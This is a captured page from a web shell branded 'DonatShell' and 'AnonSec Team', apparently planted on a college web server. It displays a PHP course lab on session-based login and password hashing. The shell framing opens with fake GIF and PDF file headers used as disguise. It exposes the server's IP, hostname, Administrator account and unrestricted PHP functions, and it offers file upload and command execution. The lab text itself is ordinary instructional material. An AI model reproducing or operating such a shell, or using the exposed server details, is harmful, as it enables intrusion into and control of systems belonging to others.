GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST1146/Labs/Lab13/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST1146/Labs/Lab13//Lab13.phpinc
<?
// JimMartinson/CST1146/Labs/Labnn/Labnn.phpinc

#if ( $_SESSION['userId'] == 1 ) $showEvaluationVariables = true;
require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced.
#if ( $_SESSION['userId'] != 1 ) { require('Gradebook/EvaluationSubmission_END.phpinc'); exit; }
include('common/Browser/Browser.phpinc');

$disabled = '';
$disabled = ' disabled'; // Comment this line to enable lab.

// NOTE: Disable Include conf/extra/httpd-autoindex.conf line in the httpd.conf file before labs.
// OR: Fix labs so Lab 4 mod_autoindex works as it should.
?>
<fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Description</legend>
The purpose of this lab is to demonstrate the use of php authentication methods.
<?=$gradeNote?>
<? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?>
</fieldset>

<fieldset><legend><?=$evaluationType?> <?=$evaluationNumber?> Instruction</legend>
<ol class="count">
	<!-- 1 -->
	<li>Create a directory called <b class="copyText"><?=$evaluationName?></b> in your <b><?=$dataFolder?><?=$dirSep?><?=$courseNumber?></b> directory. We will use it for all work performed in this lab.</li>
	<!-- 2 -->
	<li style="background-color:#eee;">Create the new mydb.myguests table with ten guests.
		<ol>
			<li>Ensure both <b>Apache</b> and <b>MySQL</b> servers are running.</li>
			<li>Open MySQL Workbench, connect to your server and ensure the <b>mydb</b> database exists. If it does not, create it.</li>
			<li>Download <a href="Create_new_myguests.php">Create_new_myguests.php</a> and save it in your <b><?=$evaluationName?></b> directory.</li>
			<li>Open <b>Create_new_myguests.php</b> in an editor.</li>
			<li>Change the <b>$password</b> value from <span class="code">your_password</span> to the root password for you MySQL server.</li>
			<li>Open a browser and load the <b>Create_new_myguests.php</b> page. <span class="note">This should create the mydb.myguests table with ten entries.</span>
				<br>You should see a page like:<br>
				<? BrowserBegin('Lab '.$evaluationNumber.' - '.$userFullName,'http://localhost/CST1146/'.$evaluationName.'/Create_new_myguests.php',820); ?>
				<img src="images/create_new_myguests.png" width="632" height="96" alt="Create new myguests table">
				<? BrowserEnd(); ?>
				If this is not what you see then you have errors in your code or something else has gone wrong.
				<br>Contact me for help if you cannot figure out what the problem is.
			</li>
			<li>Open MySQL Workbench, connect to your server and run the SQL statement <span class="code copyText">SELECT * FROM mydb.myguests;</span>
				<br>You should see results like:
				<br><img src="images/myguests.png" width="1000" height="363" alt="myguest table data">
				<br>If you do not them then something has gone wrong.
				Contact me for help if you cannot figure out what the problem is.
			</li>
			<li><b class="info">Take a screenshot of the page</b> and save the image as <b class="copyText"><?=$saveFilename?>_myguests.png</b> in your <b><?=$evaluationName?></b> directory.
				<br>Make sure that the SQL statement and Result Grid are visible before saving the image.
			</li>
		</ol>
	</li>
	<!-- 3 -->
	<li style="background-color:#ffe;">Modify <b>application.php</b> to perform authentication:
		<ol>
			<li>Copy your <b class="">application.php</b> file from a previous lab that contains the <b class="">beginPage()</b>, <b class="">endPage()</b>, and <b class="">formValue()</b> functions.</li>
			<li>Open <b class="">application.php</b> in an editor.</li>
			<li>At the bottom of the file, add the following code:
				<ol>
					<li>Start a session.</li>
					<li>Set <b class="php copyText">$f</b> equal to the return value of <b class="php copyText">formValue()</b>.</li>
					<li>Set <b class="php copyText">$f['form']</b> equal to the return value of <b class="php copyText">formValue('form')</b>.</li>
					<li>Add the code: <pre class="code copyText">
if ( !isset($message) ) { $message = ''; } // Ensure $message is set.
// Ensure the page is authenticated.
if ( !isset($_SESSION['id']) ) { $_SESSION['id'] = 0; } // Set $_SESSION['id'] to zero if not set.
if ( !isset($pageAuthentication) ) { $pageAuthentication = 'USER'; } // Ensure authenication is required if not set.
if ( $pageAuthentication != 'PUBLIC' ) { // Does this page require authentication and the guest is not authenticated?
	while ( !$_SESSION['id'] ) { // Ensure the guest is logged in (authenticated).
		require('login.php'); // Display the login page.
	}
	while ( !$_SESSION['password_OK'] ) { // Ensure the guest's password is not blank.
		require('password.php'); // Display the password set page.
	}
}</pre></li>
				</ol>
			</li>
			<li>Save the changes.</li>
		</ol>
	</li>
	<!-- 4 -->
	<li style="background-color:#fef;">Create a landing page that does not require authentication:
		<ol>
			<li>Create a PHP file named <b class="copyText">index.php</b> in the <b><?=$evaluationName?></b> directory and open it in an editor.</li>
			<li>Set <span class="php copyText">$pageAuthentication</span> equal to <span class="code copyText">'PUBLIC'</span>.</li>
			<li>Require application.php.</li>
			<li>Call the <b class="php">beginPage</b> function with a parameter of <b class="copyText">Home</b>.</li>
			<li>Display an &lt;h2&gt; element with the content <b class="copyText">This page does not require authentication.</b></li>
			<li>Add a hyperlink to the <b class="html copyText">authenticatedPage.php</b> (Authenticated) page.</li>
			<li>Call the <b class="php">endPage</b> function.</li>
			<li>Save the changes.</li>
		</ol>
	</li>
	<!-- 5 -->
	<li style="background-color:#eff;">Create a page that requires authentication:
		<ol>
			<li>Create a PHP file named <b class="copyText">authenticatedPage.php</b> in the <b><?=$evaluationName?></b> directory and open it in an editor.</li>
			<li>Require application.php.</li>
			<li>Call the <b class="php">beginPage</b> function with a parameter of <b class="copyText">Authenticated</b>.</li>
			<li>Display an &lt;h2&gt; element with the content <b class="copyText">This page requires authentication.</b></li>
			<li>Display the <b class="php copyText">$_SESSION['name']</b> variable value.</li>
			<li>Display the value of the password hash variable you created in the <b class="">password.php</b> page.</li>
			<li>Add a hyperlink to the <b class="html copyText">index.php</b> (Home) page.</li>
			<li>Call the <b class="php">endPage</b> function.</li>
			<li>Save the changes.</li>
		</ol>
	</li>
	<!-- 6 -->
	<li style="background-color:#eef;">Create the login page:
		<ol>
			<li>Create a PHP file named <b class="copyText">login.php</b> in the <b><?=$evaluationName?></b> directory and open it in an editor.</li>
			<li>If <b class="copyText">$f['form']</b> equals <b class="copyText">form_login</b> do the following:
				<ol>
					<li>SELECT the guest information from <b class="copyText">myguests</b> WHERE <b class="copyText">username</b> equals <b class="copyText">$f['username']</b>.</li>
					<li>If you <b>get one row back</b> do the following:
						<ol>
							<li>Fetch to result into <b class="php copyText">$row</b>.</li>
							<li>Verify $f['password'] is correct using the <b class="copytext">password_verify()</b> function.</li>
							<li>If <b>the password is verified</b>, do the following:
								<ol>
									<li>Set <b class="php copytext">$_SESSION['id']</b> equal to <b class="php copytext">$row['id']</b>.</li>
									<li>Set <b class="php copytext">$_SESSION['name']</b> equal to <b class="php copytext">$row['firstname'].' '.$row['lastname']</b>.</li>
									<li>Set <b class="php copytext">$_SESSION['password_OK']</b> equal to <b class="php copytext">true</b>.</li>
									<li>Set <b class="php copyText">$message</b> equal to <b class="php copyText">'&lt;h2 style="color:green;"&gt;Welcome '.$_SESSION['name'].'&lt;/h2&gt;'</b>.</li>
								</ol>
							</li>
							<li>if <b>the password is NOT verified</b> do the following:
								<ol>
									<li>If $row['password'] and $f['password'] are blank do the following:
										<ol>
											<li>Set <b class="php copytext">$_SESSION['id']</b> equal to <b class="php copytext">$row['id']</b>.</li>
											<li>Set <b class="php copytext">$_SESSION['name']</b> equal to <b class="php copytext">$row['firstname'].' '.$row['lastname']</b>.</li>
											<li>Set <b class="php copytext">$_SESSION['password_OK']</b> equal to <b class="php copytext">false</b>.</li>
											<li>Set <b class="php copyText">$message</b> equal to <b class="php copyText">'&lt;h2 style="color:orange;"&gt;Your password is blank.&lt;/h2&gt;'</b>.</li>
										</ol>
									</li>
									<li>If <b>either is NOT blank</b> do the following:
										<ol>
											<li>Set <b class="php copytext">$_SESSION['id']</b> equal to <b class="php copytext">0</b> <span class="note normal">(zero)</span>.</li>
											<li>Set <b class="php copytext">$_SESSION['password_OK']</b> equal to <b class="php copytext">false</b>.</li>
											<li>Set <b class="php copyText">$message</b> equal to <b class="php copyText">'&lt;h2 style="color:red;"&gt;Invalid Login. The Username and/or Password is incorrect.&lt;/h2&gt;'</b>.</li>
										</ol>
									</li>
								</ol>
							</li>
						</ol>
					</li>
					<li>If you <b>DO NOT get one row back</b> do the following:
						<ol>
							<li>Set <b class="php copyText">$_SESSION['id']</b> equal to 0 <span class="note normal">(zero)</span>.</li>
							<li>Set <b class="php copyText">$_SESSION['password_OK']</b> equal to <b class="php copytext">false</b>.</li>
							<li>Set <b class="php copyText">$message</b> equal to <b class="php copyText">'&lt;h2 style="color:red;"&gt;Invalid Login. The Username and/or Password is incorrect.&lt;/h2&gt;'</b>.</li>
						</ol>
					</li>
				</ol>
			</li>
			<li>If <b class="copyText">$_SESSION['id']</b> equals 0 do the following: <span class="note normal">(zero)</span>
				<ol>
					<li>Call the <b class="php">beginPage</b> function with a parameter of <b class="copyText">Login</b>.</li>
					<li>Display <b class="php copyText">$message</b>.</li>
					<li>Set <b class="php copyText">$f['username']</b> equal to the return value of <b class="php copyText">formValue('username')</b>.</li>
					<li>Display a form with the following attributes and elements:
						<ol>
							<li>The <b class="html">action</b> attribute is set so the page loads itself upon submit.</li>
							<li>The <b class="html">method</b> attribute is set to <b class="html">post</b>.</li>
							<li>An  <b class="html">input</b> element of <b class="html">type</b> <b class="html">hidden</b> named <b class="copyText html">form</b> with the <b class="html">value</b> of <b class="copyText code">form_login</b>.</li>
							<li>An <b class="html">input</b> element of <b class="html">type</b> <b class="html">text</b> named <b class="copyText html">username</b> with a label of <b class="copyText code">Username:</b> and a <b class="html">value</b> equal to the value of <b class="copyText">$f['username']</b>.</li>
							<li>An <b class="html">input</b> element of <b class="html">type</b> <b class="html">password</b> named <b class="copyText html">password</b> with a label of <b class="copyText code">Password:</b> and a blank <b class="html">value</b>.</li>
							<li>An <b class="html">input</b> element of <b class="html">type</b> <b class="html">submit</b> named <b class="copyText html">task</b> with the  of <b class="html">value</b> of <b class="copyText code">Login</b>.</li>
						</ol>
					</li>
					<li>Call the <b class="php">endPage</b> function.</li>
					<li>Stop php processing with the <b class="php copyText">exit;</b> statement.</li>
				</ol>
			</li>
			<li>Save the changes.</li>
		</ol>
	</li>
	<!-- 7 -->
	<li style="background-color:#efe;">Create the set password page:
		<ol>
			<li>Create a PHP file named <b class="copyText">password.php</b> in the <b><?=$evaluationName?></b> directory and open it in an editor.</li>
			<li>If <b class="php copyText">$f['form']</b> equals  <b class="copyText">form_password</b> do the following:
				<ol>
					<li>If <b>$f['password'] is an empty string</b> do the following:
						<ol>
							<li>Set <b class="php copyText">$_SESSION['password_OK']</b> equal to false.</li>
							<li>Set <b class="php copyText">$message</b> equal to a meaningful error message.</li>
						</ol>
					</li>
					<li>If <b>$f['password'] IS NOT an empty string</b> do the following:
						<ol>
							<li>If <b>$f['password'] equals $f['verifypassword']</b> do the following:
								<ol>
									<li>Set <b class="copyText">$_SESSION['password_OK']</b> equal to <b class="code copyText">true</b>.</li>
									<li>Create a password hash with the <b class="php copyText">password_hash()</b> function.</li>
									<li>Store the password hash for the guest in the database.</li>
								</ol>
							</li>
							<li>If <b>$f['password'] DOES NOT equal $f['verifypassword']</b> do the following:
								<ol>
									<li>Set <b class="php copyText">$_SESSION['password_OK']</b> equal to false.</li>
									<li>Set <b class="php copyText">$message</b> equal to a meaningful error message. <span class="note">The passwords do not match.</span></li>
								</ol>
							</li>
						</ol>
					</li>
				</ol>
			</li>
			<li>If <b class="copyText">$_SESSION['password_OK']</b> is false:
				<ol>
					<li>Call the <b class="php">beginPage</b> function with a parameter of <b class="copyText">Set password for </b> and the value of <b class="php copyText">$_SESSION['name']</b>.</li>
					<li>Display $message.</li>
					<li>Display a form with the following attributes and elements:
						<ol>
							<li>The <b class="html">action</b> attribute is set so the page loads itself upon submit.</li>
							<li>The <b class="html">method</b> attribute is set to <b class="html">post</b>.</li>
							<li>An  <b class="html">input</b> element of <b class="html">type</b> <b class="html">hidden</b> named <b class="copyText html">form</b> with the <b class="html">value</b> of <b class="copyText code">form_password</b>.</li>
							<li>An <b class="html">input</b> element of <b class="html">type</b> <b class="html">password</b> named <b class="copyText html">password</b> with a label of <b class="copyText code">Password:</b> and a blank <b class="html">value</b>.</li>
							<li>An <b class="html">input</b> element of <b class="html">type</b> <b class="html">password</b> named <b class="copyText html">verifypassword</b> with a label of <b class="copyText code">Verify password:</b> and a blank <b class="html">value</b>.</li>
							<li>An <b class="html">input</b> element of <b class="html">type</b> <b class="html">submit</b> named <b class="copyText html">task</b> with the  of <b class="html">value</b> of <b class="copyText code">Set password</b>.</li>
						</ol>
					</li>
					<li>Call the <b class="php">endPage</b> function.</li>
					<li>Stop php processing with the <b class="php copyText">exit;</b> statement.</li>
				</ol>
			</li>
			<li>Save the changes.</li>
		</ol>
	</li>
	<!-- 8 -->
	<li>Verify your pages work:
		<ol>
			<li>Load the landing page (index.php).</li>
			<li>Click on the authenticatedPage.php page hyperlink.</li>
			<li>Login as <b class="copyText">AvramHinton</b> with no password.</li>
			<li>This should bring up the password.php page and ask to <b>Set password for AvramHinton</b>.</li>
			<li>Enter a new password into the <b>Password</b> and <b>Verify password</b> fields.</li>
			<li>You should now see the authenticatedPage.php page with something like:
				<? BrowserBegin('Create a file','http://localhost/CST1146/'.$evaluationName.'/'.$saveFilename.'_Form.php',820); ?>
				<h1 class="left">Authenticated</h1>
				<h2>This page requires authentication.</h2>
				$_SESSION['name'] = AvramHinton
				<br>
				The password hash = $2y$10$Kn4mlZ5wCccVjvgkdzB4aebSnCooeWzFPpucKBWGsiY2Bi6zeWvt6
				<br>
				<a href="index.php">Home</a>
				<br><span style="color:silver; font-size:smaller">Written by  <?=$userFullName?>.</span>
				<? BrowserEnd(); /**/ ?>
				<span class="note">The value of the password hash will be different</span>
			</li>
			<li><b class="info">Take a screenshot of the page</b> and save the image as <b class="copyText"><?=$saveFilename?>_authenticatedPage.png</b> in your <b><?=$evaluationName?></b> directory.
				<br>Make sure that the address bar is visible in your browser before saving the image.
			</li>
		</ol>
	</li>
	<!-- 9 -->
	<li style="background-color:#eee;">Verify the new password is stored in the database:
		<ol>
			<li>Open MySQL Workbench, connect to your server and run the SQL statement <span class="code copyText">SELECT * FROM mydb.myguests;</span>
				<br>You should see results like:
				<br><img src="images/myguests_password.png" width="1000" height="357" alt="myguest table data with new password">
				<br><span class="note">The values in the password field will be different but the one for AvramHinton should be the same as the password hash above.</span>
				<br>If you do not this then something has gone wrong.
				Contact me for help if you cannot figure out what the problem is.
			</li>
			<li><b class="info">Take a screenshot of the page</b> and save the image as <b class="copyText"><?=$saveFilename?>_myguests_password.png</b> in your <b><?=$evaluationName?></b> directory.
				<br>Make sure that the SQL statement and Result Grid are visible before saving the image.
			</li>
		</ol>
		<span class="bold warning">Warning: If you have already set the password for AvramHinton and no longer get the password hash displayed:
			<br>Set AvramHinton's password back to NULL and try again.</span>
			<br><span class="note normal"> You may also want to destroy the session instead of having to close and reopen your browser.
			<br>Here is code you can put into a file like <b class="copyText">destroySESSION.php</b> and load in your browser to do that:
			<br><pre class="php copyText">&lt;?php
session_start();
session_destroy();
?&gt;
&lt;h1&gt;The session has been destroyed!&lt;/h1&gt;
&lt;a href="."&gt;List files&lt;/a&gt;</pre>
		</span>
	</li>
	<!-- 10 -->
	<li>Turn in your assignment:
		<ol>
			<li>Ensure the following files are in your <b><?=$evaluationName?></b> folder:<br>
<?
$fileList = array(
	'Create_new_myguests.php',
	$saveFilename.'_myguests.png',
	'application.php',
	'index.php',
	'authenticatedPage.php',
	'login.php',
	'password.php',
	$saveFilename.'_authenticatedPage.png',
	$saveFilename.'_myguests_password.png',
);
	natcasesort($fileList);
						foreach ($fileList as $fileName) {
?>
				<?=$fileName?><br>
<?
						}
?>

			</li>
			<li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b class="copyText"><?=$uploadFilename?></b>.</li>
			<li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li>
			<li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.</li>
		</ol>
	</li>
</ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?>
</fieldset>
<?
require('../LabNotes.phpinc');
require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced.
?>

Anon7 - 2022
AnonSec Team